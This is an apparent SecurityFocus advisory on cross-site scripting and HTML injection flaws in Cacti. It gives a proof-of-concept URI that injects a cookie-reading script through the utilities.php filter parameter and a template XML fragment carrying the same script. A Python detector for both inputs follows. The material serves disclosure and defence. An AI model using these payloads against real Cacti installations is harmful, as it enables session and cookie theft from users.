Cacti Cross Site Scripting and HTML Injection Vulnerabilities

Attackers can use a browser to exploit these issues. To exploit a cross-site scripting vulnerability, an attacker must entice an unsuspecting user to follow a malicious URI.

The following examples are available:

Cross-site scripting:

http://www.example.com/cacti/utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&page=1&action=view_logfile

HTML-injection:

<cacti>
<hash_000016fe5edd777a76d48fc48c11aded5211ef>
<name>
Unix - Load Average<![CDATA[<script>alert(document.cookie)</script>]]>
</name>
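A screening check for the two example inputs above, added here as an illustration; it is not part of the original advisory and is not Cacti code. It flags a `filter` value on `utilities.php` that carries HTML metacharacters and lists template `<name>` values that contain markup before a template is imported. The function names, the metacharacter set, and the closing tags and second entry in the sample XML are assumptions.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit, parse_qs

# Assumed review rule: characters that can close an attribute or open a tag.
MARKUP = re.compile(r'[<>"]')

# Example URI from the advisory, split across lines for readability.
PAGE_URL = ("http://www.example.com/cacti/utilities.php?tail_lines=50"
            "&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1"
            "&filter=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E"
            "&page=1&action=view_logfile")

# The advisory's fragment, closed off so it parses; the closing tags and the
# second (benign) entry are constructed for this example.
SAMPLE_XML = """<cacti>
<hash_000016fe5edd777a76d48fc48c11aded5211ef>
<name>
Unix - Load Average<![CDATA[<script>alert(document.cookie)</script>]]>
</name>
</hash_000016fe5edd777a76d48fc48c11aded5211ef>
<hash_constructed_benign>
<name>Unix - Logged in Users</name>
</hash_constructed_benign>
</cacti>"""

def suspicious_filter(url):
    """Return the decoded 'filter' value of a utilities.php request (full URL
    or the request path from an access log) if it contains markup, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/utilities.php"):
        return None
    for value in parse_qs(parts.query).get("filter", []):  # percent-decoded
        if MARKUP.search(value):
            return value
    return None

def template_names_with_markup(xml_text):
    """Return each <name> value in a template export that contains markup.
    ElementTree merges CDATA into .text, so wrapped tags are visible here."""
    root = ET.fromstring(xml_text)
    return [el.text.strip() for el in root.iter("name")
            if el.text and MARKUP.search(el.text)]

if __name__ == "__main__":
    print("filter:", suspicious_filter(PAGE_URL))
    print("names: ", template_names_with_markup(SAMPLE_XML))
```

A hit means the value needs review, and the application still has to HTML-encode both fields on output.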


 

Copyright 2010, SecurityFocus